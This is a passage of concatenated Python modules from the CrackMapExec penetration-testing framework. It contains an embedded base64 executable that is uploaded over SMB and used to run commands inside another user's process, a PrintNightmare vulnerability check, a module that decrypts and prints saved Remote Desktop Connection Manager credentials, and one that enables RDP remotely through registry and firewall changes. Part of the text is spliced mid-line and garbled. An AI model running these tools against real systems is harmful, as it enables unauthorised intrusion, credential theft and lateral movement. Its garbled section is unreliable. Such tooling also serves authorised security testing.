RYpGikeKSIpJikqKS4pMik2KTopAAAAGADAMAAAABApEikUKRYpKCksKTApNCk4KTwpAClEKUgpTClQKVQpWClcKWApZCloKWwpcCl0KXgpfClAKYQpiCmMKZAplCmYKZwpoCmkKagprCmwKbQpuCm8KYApxCnIKcwp0CnUKdgp3CngKeQp6CnsKfAp9Cn4KfwpwCoEKggqDCoQKhQqGCocKiAqJCooKjAqNCo4KjwqACpEKkgqTCpQKlQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqAHADAHgBAACYpKikuKTIpNik6KT4pAilGKUopTilSKVYpWileKWIpZilqKW4pcil2KXopfilCKYYpiimOKZIplimaKZ4poimmKaoprimyKbYpuim+KYIpxinKKc4p0inWKdop3iniKeYp6inuKfIp9in6Kf4pwioGKgoqDioSKhYqGioeKiIqJioqKi4qMio2KjoqPioCKkYqSipOKlIqVipaKl4qYipmKmoqbipyKnYqeip+KkIqhiqKKo4qkiqWKpoqniqiKqYqqiquKrIqtiq6Kr4qgirGKsoqzirSKtYq2ireKuIq5irqKu4q8ir2Kvoq/irCKwYrCisOKxIrFisaKx4rIismKyorLisyKzYrOis+KwIrRitKK04rUitWK1orXitiK2YraituK3Irdit6K34rQiuGK4orjiuSK5YrmiueK6IrpiuqK64rsiu2K7orviuCK8YryivOK9Ir1ivaK94r4ivmK+or7ivyK/Yr+iv+K8AAACAAwCIAAAACKAYoCigOKBIoFigaKB4oIigmKCooLigyKDYoOig+KAIoRihKKE4oUihWKFooXihiKGYoaihuKHIodih6KH4oQiiGKIoojiiSKJYomiieKKIopiiqKK4osii4K7wrgCvEK8grzCvQK9Qr2CvcK+Ar5CvoK+wr8Cv0K/gr/CvAAAAkAMArAEAAACgEKAgoDCgQKBQoGCgcKCAoJCgoKCwoMCg0KDgoPCgAKEQoSChMKFAoVChYKFwoYChkKGgobChwKHQoeCh8KEAohCiIKIwokCiUKJgonCigKKQoqCisKLAotCi4KLwogCjEKMgozCjQKNQo2CjcKOAo5CjoKOwo8Cj0KPgo/CjAKQQpCCkMKRApFCkYKRwpICkkKSgpLCkwKTQpOCk8KQApRClIKUwpUClUKVgpXClgKWQpaClsKXApdCl4KXwpQCmEKYgpjCmQKZQpmCmcKaAppCmoKawpsCm0KbgpvCmAKcQpyCnMKdAp1CnYKdwp4CnkKegp7CnwKfQp+Cn8KcAqBCoIKgwqECoUKhgqHCogKiQqKCosKjAqNCo4KjwqACpEKkgqTCpQKlQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq3CrgKuQq6CrsKvAq9Cr4KvwqwCsEKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrQCwAwAcAAAAWK1wrXitAK4YriCuKK4wrjiuAAAAEAQAgAAAAHCheKGAoYihkKGYoaChqKGwobihyKHQodih4KHoofCh+KEAogiiGKIgokCioKLoogijKKNIo2ijmKOwo7ijwKP4owCksKa4psCmyKYgrDCsWKyArKis0KwArSitUK14raCtyK3wrSCuSK5wrrCuAK9Qr5ivwK/4rwAgBAAcAAAAKKBIoHigoKDIoPigMKFYoYChsKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')
if "EXEC" in module_options:
self.cmd = module_options["EXEC"]
if "PID" in module_options:
self.pid = module_options["PID"]
def on_admin_login(self, context, connection):
if self.useembeded:
file_to_upload = "/tmp/pi.exe"
with open(file_to_upload, 'wb') as pm:
pm.write(self.pi_embedded)
else:
if path.isfile(self.imp_exe):
file_to_upload = self.imp_exe
else:
context.log.error(f"Cannot open {self.imp_exe}")
exit(1)
try:
if self.cmd == "" or self.pid == "":
self.uploadfile = False
context.log.highlight(f"Firstly run tasklist.exe /v to find process id for each user")
context.log.highlight(f"Usage: -o PID=pid EXEC='Command'")
return
else:
self.uploadfile = True
context.log.display(f"Uploading {self.pi}")
with open(file_to_upload, 'rb') as pi:
try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.pi}", pi.read)
context.log.success(f"pi.exe successfully uploaded")
except Exception as e:
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return
context.log.display(f"Executing {self.cmd}")
command = f'{self.tmp_dir}pi.exe {self.pid} \"{self.cmd}\"'
for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
context.log.highlight(line)
except Exception as e:
context.log.fail(f"Error running command: {e}")
finally:
try:
if self.uploadfile == True:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.pi}")
context.log.success(f"pi.exe successfully deleted")
except Exception as e:
context.log.fail(f"Error deleting pi.exe on {self.share}: {e}")
================================================
FILE: cme/modules/printnightmare.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.structure import Structure
from impacket.dcerpc.v5 import transport, rprn
from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRSTRUCT, NDRUNION, NULL
from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR
from impacket.dcerpc.v5.rprn import checkNullString, STRING_HANDLE, PBYTE_ARRAY
KNOWN_PROTOCOLS = {
135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
445: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
}
class CMEModule:
"""
Check if vulnerable to printnightmare
Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare
"""
name = "printnightmare"
description = "Check if host vulnerable to printnightmare"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.__string_binding = None
self.port = None
def options(self, context, module_options):
"""
PORT Port to check (defaults to 445)
"""
self.port = 445
if "PORT" in module_options:
self.port = int(module_options["PORT"])
def on_login(self, context, connection):
# Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)
stringbinding = r"ncacn_np:%s[\PIPE\spoolss]" % connection.host
context.log.info("Binding to %s" % (repr(stringbinding)))
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_credentials(
connection.username,
connection.password,
connection.domain,
connection.lmhash,
connection.nthash,
connection.aesKey,
)
rpctransport.set_kerberos(connection.kerberos, kdcHost=connection.kdcHost)
rpctransport.setRemoteHost(connection.host)
rpctransport.set_dport(self.port)
try:
dce = rpctransport.get_dce_rpc()
# Connect to spoolss named pipe
dce.connect()
# Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB
dce.bind(rprn.MSRPC_UUID_RPRN)
except Exception as e:
context.log.fail("Failed to bind: %s" % e)
sys.exit(1)
flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
driver_container = DRIVER_CONTAINER()
driver_container["Level"] = 2
driver_container["DriverInfo"]["tag"] = 2
driver_container["DriverInfo"]["Level2"]["cVersion"] = 0
driver_container["DriverInfo"]["Level2"]["pName"] = NULL
driver_container["DriverInfo"]["Level2"]["pEnvironment"] = NULL
driver_container["DriverInfo"]["Level2"]["pDriverPath"] = NULL
driver_container["DriverInfo"]["Level2"]["pDataFile"] = NULL
driver_container["DriverInfo"]["Level2"]["pConfigFile"] = NULL
driver_container["DriverInfo"]["Level2"]["pConfigFile"] = NULL
try:
hRpcAddPrinterDriverEx(
dce,
pName=NULL,
pDriverContainer=driver_container,
dwFileCopyFlags=flags,
)
except DCERPCSessionError as e:
# RPC_E_ACCESS_DENIED is returned on patched systems, when
# a non-administrative user tries to create a new printer
# driver
if e.error_code == RPC_E_ACCESS_DENIED:
context.log.info("Not vulnerable :'(")
return False
# If vulnerable, 'ERROR_INVALID_PARAMETER' will be returned
if e.error_code == system_errors.ERROR_INVALID_PARAMETER:
context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare")
return True
raise e
context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare")
return True
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__(self):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return "RPRN SessionError: code: 0x%x - %s - %s" % (
self.error_code,
error_msg_short,
error_msg_verbose,
)
else:
return "RPRN SessionError: unknown error code: 0x%x" % self.error_code
################################################################################
# CONSTANTS
################################################################################
# MS-RPRN - 3.1.4.4.8
APD_COPY_ALL_FILES = 0x00000004
APD_COPY_FROM_DIRECTORY = 0x00000010
APD_INSTALL_WARNED_DRIVER = 0x00008000
# MS-RPRN - 3.1.4.4.7
DPD_DELETE_UNUSED_FILES = 0x00000001
# https://docs.microsoft.com/en-us/windows/win32/com/com-error-codes-3
RPC_E_ACCESS_DENIED = 0x8001011B
system_errors.ERROR_MESSAGES[RPC_E_ACCESS_DENIED] = (
"RPC_E_ACCESS_DENIED",
"Access is denied.",
)
################################################################################
# STRUCTURES
################################################################################
# MS-RPRN - 2.2.1.5.1
class DRIVER_INFO_1(NDRSTRUCT):
structure = (("pName", STRING_HANDLE),)
class PDRIVER_INFO_1(NDRPOINTER):
referent = (("Data", DRIVER_INFO_1),)
# MS-RPRN - 2.2.1.5.2
class DRIVER_INFO_2(NDRSTRUCT):
structure = (
("cVersion", DWORD),
("pName", LPWSTR),
("pEnvironment", LPWSTR),
("pDriverPath", LPWSTR),
("pDataFile", LPWSTR),
("pConfigFile", LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (("Data", DRIVER_INFO_2),)
class DRIVER_INFO_2_BLOB(Structure):
structure = (
("cVersion", " 0:
add_user_bh(credz_bh, None, context.log, connection.config)
except Exception as e:
context.log.fail("Error openning dump file", str(e))
================================================
FILE: cme/modules/pso.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from math import fabs
import re
class CMEModule:
'''
Created by fplazar and wanetty
Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
'''
name = 'pso'
description = "Query to get PSO from LDAP"
supported_protocols = ['ldap']
opsec_safe = True
multiple_hosts = True
pso_fields = [
"cn",
"msDS-PasswordReversibleEncryptionEnabled",
"msDS-PasswordSettingsPrecedence",
"msDS-MinimumPasswordLength",
"msDS-PasswordHistoryLength",
"msDS-PasswordComplexityEnabled",
"msDS-LockoutObservationWindow",
"msDS-LockoutDuration",
"msDS-LockoutThreshold",
"msDS-MinimumPasswordAge",
"msDS-MaximumPasswordAge",
"msDS-PSOAppliesTo",
]
def options(self, context, module_options):
'''
No options available.
'''
pass
def convert_time_field(self, field, value):
time_fields = {
"msDS-LockoutObservationWindow": (60, "mins"),
"msDS-MinimumPasswordAge": (86400, "days"),
"msDS-MaximumPasswordAge": (86400, "days"),
"msDS-LockoutDuration": (60, "mins")
}
if field in time_fields.keys():
value = f"{int((fabs(float(value)) / (10000000 * time_fields[field][0])))} {time_fields[field][1]}"
return value
def on_login(self, context, connection):
'''Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection'''
# Building the search filter
searchFilter = "(objectClass=msDS-PasswordSettings)"
try:
context.log.debug('Search Filter=%s' % searchFilter)
resp = connection.ldapConnection.search(searchFilter=searchFilter,
attributes=self.pso_fields,
sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
logging.debug(e)
return False
pso_list = []
context.log.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
pso_info = {}
try:
for attribute in item['attributes']:
attr_name = str(attribute['type'])
if attr_name in self.pso_fields:
pso_info[attr_name] = attribute['vals'][0]._value.decode('utf-8')
pso_list.append(pso_info)
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(pso_list) > 0:
context.log.success('Password Settings Objects (PSO) found:')
for pso in pso_list:
for field in self.pso_fields:
if field in pso:
value = self.convert_time_field(field, pso[field])
context.log.highlight(u'{}: {}'.format(field, value))
context.log.highlight('-----')
else:
context.log.info('No Password Settings Objects (PSO) found.')
================================================
FILE: cme/modules/rdcman.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from dploot.triage.rdg import RDGTriage
from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file
from dploot.triage.backupkey import BackupkeyTriage
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from cme.helpers.logger import highlight
class CMEModule:
name = "rdcman"
description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
PVK Domain backup key file
MKFILE File with masterkeys in form of {GUID}:SHA1
"""
self.pvkbytes = None
self.masterkeys = None
if "PVK" in module_options:
self.pvkbytes = open(module_options["PVK"], "rb").read()
if "MKFILE" in module_options:
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
self.pvkbytes = open(module_options["MKFILE"], "rb").read()
def on_admin_login(self, context, connection):
host = connection.hostname + "." + connection.domain
domain = connection.domain
username = connection.username
kerberos = connection.kerberos
aesKey = connection.aesKey
use_kcache = getattr(connection, "use_kcache", False)
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
if self.pvkbytes is None:
try:
dc = Target.create(
domain=domain,
username=username,
password=password,
target=domain,
lmhash=lmhash,
nthash=nthash,
do_kerberos=kerberos,
aesKey=aesKey,
no_pass=True,
use_kcache=use_kcache,
)
dc_conn = DPLootSMBConnection(dc)
dc_conn.connect()
if dc_conn.is_admin:
context.log.success("User is Domain Administrator, exporting domain backupkey...")
backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)
backupkey = backupkey_triage.triage_backupkey()
self.pvkbytes = backupkey.backupkey_v2
except Exception as e:
context.log.debug("Could not get domain backupkey: {}".format(e))
pass
target = Target.create(
domain=domain,
username=username,
password=password,
target=host,
lmhash=lmhash,
nthash=nthash,
do_kerberos=kerberos,
aesKey=aesKey,
no_pass=True,
use_kcache=use_kcache,
)
conn = None
try:
conn = DPLootSMBConnection(target)
conn.smb_session = connection.conn
except Exception as e:
context.log.debug("Could not upgrade connection: {}".format(e))
return
plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")}
nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in context.db.get_credentials(cred_type="hash")}
if password != "":
plaintexts[username] = password
if nthash != "":
nthashes[username] = nthash
if self.masterkeys is None:
try:
masterkeys_triage = MasterkeysTriage(
target=target,
conn=conn,
pvkbytes=self.pvkbytes,
passwords=plaintexts,
nthashes=nthashes,
)
self.masterkeys = masterkeys_triage.triage_masterkeys()
except Exception as e:
context.log.debug("Could not get masterkeys: {}".format(e))
if len(self.masterkeys) == 0:
context.log.fail("No masterkeys looted")
return
context.log.success("Got {} decrypted masterkeys. Looting RDCMan secrets".format(highlight(len(self.masterkeys))))
try:
triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys)
rdcman_files, rdgfiles = triage.triage_rdcman()
for rdcman_file in rdcman_files:
if rdcman_file is None:
continue
for rdg_cred in rdcman_file.rdg_creds:
if rdg_cred.type == "cred":
context.log.highlight(
"[%s][%s] %s:%s"
% (
rdcman_file.winuser,
rdg_cred.profile_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
elif rdg_cred.type == "logon":
context.log.highlight(
"[%s][%s] %s:%s"
% (
rdcman_file.winuser,
rdg_cred.profile_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
elif rdg_cred.type == "server":
context.log.highlight(
"[%s][%s] %s - %s:%s"
% (
rdcman_file.winuser,
rdg_cred.profile_name,
rdg_cred.server_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
for rdgfile in rdgfiles:
if rdgfile is None:
continue
for rdg_cred in rdgfile.rdg_creds:
if rdg_cred.type == "cred":
context.log.highlight(
"[%s][%s] %s:%s"
% (
rdgfile.winuser,
rdg_cred.profile_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
elif rdg_cred.type == "logon":
context.log.highlight(
"[%s][%s] %s:%s"
% (
rdgfile.winuser,
rdg_cred.profile_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
elif rdg_cred.type == "server":
context.log.highlight(
"[%s][%s] %s - %s:%s"
% (
rdgfile.winuser,
rdg_cred.profile_name,
rdg_cred.server_name,
rdg_cred.username,
rdg_cred.password.decode("latin-1"),
)
)
except Exception as e:
context.log.debug("Could not loot RDCMan secrets: {}".format(e))
================================================
FILE: cme/modules/rdp.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import exit
from cme.connection import dcom_FirewallChecker
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
class CMEModule:
name = "rdp"
description = "Enables/Disables RDP"
supported_protocols = ["smb" ,"wmi"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.action = None
def options(self, context, module_options):
"""
ACTION Enable/Disable RDP (choices: enable, disable, enable-ram, disable-ram)
METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi)
OLD For old version system (under NT6, like: server 2003)
DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds)
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
"""
if not "ACTION" in module_options:
context.log.fail("ACTION option not specified!")
exit(1)
if module_options["ACTION"].lower() not in ["enable", "disable", "enable-ram", "disable-ram"]:
context.log.fail("Invalid value for ACTION option!")
exit(1)
self.action = module_options["ACTION"].lower()
if not "METHOD" in module_options:
self.method = "wmi"
else:
self.method = module_options['METHOD'].lower()
if context.protocol != "smb" and self.method == "smb":
context.log.fail(f"Protocol: {context.protocol} not support this method")
exit(1)
if not "DCOM-TIMEOUT" in module_options:
self.dcom_timeout = 10
else:
try:
self.dcom_timeout = int(module_options['DCOM-TIMEOUT'])
except:
context.log.fail("Wrong DCOM timeout value!")
exit(1)
if not "OLD" in module_options:
self.oldSystem = False
else:
self.oldSystem = True
def on_admin_login(self, context, connection):
# Preparation for wmi protocol
if self.method == "smb":
context.log.info("Executing over SMB(ncacn_np)")
try:
smb_rdp = rdp_SMB(context, connection)
if "ram" in self.action:
smb_rdp.rdp_RAMWrapper(self.action)
else:
smb_rdp.rdp_Wrapper(self.action)
except Exception as e:
context.log.fail(f"Enable RDP via smb error: {str(e)}")
elif self.method == "wmi":
context.log.info("Executing over WMI(ncacn_ip_tcp)")
wmi_rdp = rdp_WMI(context, connection, self.dcom_timeout)
if hasattr(wmi_rdp, '_rdp_WMI__iWbemLevel1Login'):
if "ram" in self.action:
# Nt version under 6 not support RAM.
try:
wmi_rdp.rdp_RAMWrapper(self.action)
except Exception as e:
if "WBEM_E_NOT_FOUND" in str(e):
context.log.fail("System version under NT6 not support restricted admin mode")
else:
context.log.fail(str(e))
pass
else:
try:
wmi_rdp.rdp_Wrapper(self.action, self.oldSystem)
except Exception as e:
if "WBEM_E_INVALID_NAMESPACE" in str(e):
context.log.fail('Looks like target system version is under NT6, please add "OLD=true" in module options.')
else:
context.log.fail(str(e))
pass
wmi_rdp._rdp_WMI__dcom.disconnect()
class rdp_SMB:
def __init__(self, context, connection):
self.context = context
self.__smbconnection = connection.conn
self.__execute = connection.execute
self.logger = context.log
def rdp_Wrapper(self, action):
remoteOps = RemoteOperations(self.__smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
)
keyHandle = ans["phkResult"]
ans = rrp.hBaseRegSetValue(
remoteOps._RemoteOperations__rrp,
keyHandle,
"fDenyTSConnections",
rrp.REG_DWORD,
0 if action == "enable" else 1,
)
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections")
if int(data) == 0:
self.logger.success("Enable RDP via SMB(ncacn_np) successfully")
elif int(data) == 1:
self.logger.success("Disable RDP via SMB(ncacn_np) successfully")
self.firewall_CMD(action)
if action == "enable":
self.query_RDPPort(remoteOps, regHandle)
try:
remoteOps.finish()
except:
pass
def rdp_RAMWrapper(self, action):
remoteOps = RemoteOperations(self.__smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"System\\CurrentControlSet\\Control\\Lsa",
)
keyHandle = ans["phkResult"]
rrp.hBaseRegSetValue(
remoteOps._RemoteOperations__rrp,
keyHandle,
"DisableRestrictedAdmin",
rrp.REG_DWORD,
0 if action == "enable-ram" else 1,
)
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "DisableRestrictedAdmin")
if int(data) == 0:
self.logger.success("Enable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
elif int(data) == 1:
self.logger.success("Disable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
try:
remoteOps.finish()
except:
pass
def query_RDPPort(self, remoteOps, regHandle):
if remoteOps:
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
)
keyHandle = ans["phkResult"]
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "PortNumber")
self.logger.success(f"RDP Port: {str(data)}")
# https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb
def firewall_CMD(self, action):
cmd = f"netsh firewall set service type = remotedesktop mode = {action}"
self.logger.info("Configure firewall via execute command.")
output = self.__execute(cmd, True)
if output:
self.logger.success(f"{action.capitalize()} RDP firewall rules via cmd succeed")
else:
self.logger.fail(f"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.")
class rdp_WMI:
def __init__(self, context, connection, timeout):
self.logger = context.log
self.__currentprotocol = context.protocol
# From dfscoerce.py
self.__username=connection.username
self.__password=connection.password
self.__domain=connection.domain
self.__lmhash=connection.lmhash
self.__nthash=connection.nthash
self.__target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
self.__doKerberos=connection.kerberos
self.__kdcHost=connection.kdcHost
self.__aesKey=connection.aesKey
self.__timeout = timeout
try:
self.__dcom = DCOMConnection(
self.__target,
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
oxidResolver=True,
doKerberos=self.__doKerberos,
kdcHost=self.__kdcHost,
)
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
if self.__currentprotocol == "smb":
flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)
if not flag or not self.__stringBinding:
error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the module option "DCOM-TIMEOUT=10". If it\'s still failing maybe something is blocking the RPC connection, please try to use "-o" with "METHOD=smb"'
if not self.__stringBinding:
error_msg = "RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
# Make it force break function
self.__dcom.disconnect()
self.__iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
except Exception as e:
self.logger.fail(f'Unexpected wmi error: {str(e)}, please try to use "-o" with "METHOD=smb"')
if self.__iWbemLevel1Login in locals():
self.__dcom.disconnect()
def rdp_Wrapper(self, action, old=False):
if old == False:
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
self.__iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
if action == 'enable':
self.logger.info("Enabled RDP services and setting up firewall.")
iWbemClassObject.SetAllowTSConnections(1,1)
elif action == 'disable':
self.logger.info("Disabled RDP services and setting up firewall.")
iWbemClassObject.SetAllowTSConnections(0,0)
else:
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
self.__iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
if action == 'enable':
self.logger.info("Enabling RDP services (old system not support setting up firewall)")
iWbemClassObject.SetAllowTSConnections(1)
elif action == 'disable':
self.logger.info("Disabling RDP services (old system not support setting up firewall)")
iWbemClassObject.SetAllowTSConnections(0)
self.query_RDPResult(old)
if action == 'enable':
self.query_RDPPort()
# Need to create new iWbemServices interface in order to flush results
def query_RDPResult(self, old=False):
if old == False:
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
self.__iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
result = dict(iWbemClassObject.getProperties())
result = result['AllowTSConnections']['value']
if result == 0:
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully")
else:
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully")
else:
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
self.__iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
result = dict(iWbemClassObject.getProperties())
result = result['AllowTSConnections']['value']
if result == 0:
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
else:
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
def query_RDPPort(self):
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/DEFAULT', NULL, NULL)
self.__iWbemLevel1Login.RemRelease()
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
out = StdRegProv.GetDWORDValue(2147483650, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp', 'PortNumber')
self.logger.success(f"RDP Port: {str(out.uValue)}")
# Nt version under 6 not support RAM.
def rdp_RAMWrapper(self, action):
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
self.__iWbemLevel1Login.RemRelease()
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
if action == 'enable-ram':
self.logger.info("Enabling Restricted Admin Mode.")
StdRegProv.SetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin', 0)
elif action == 'disable-ram':
self.logger.info("Disabling Restricted Admin Mode (Clear).")
StdRegProv.DeleteValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
out = StdRegProv.GetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
if out.uValue == 0:
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
elif out.uValue == None:
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
================================================
FILE: cme/modules/reg-query.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.dcerpc.v5.rpcrt import DCERPCException
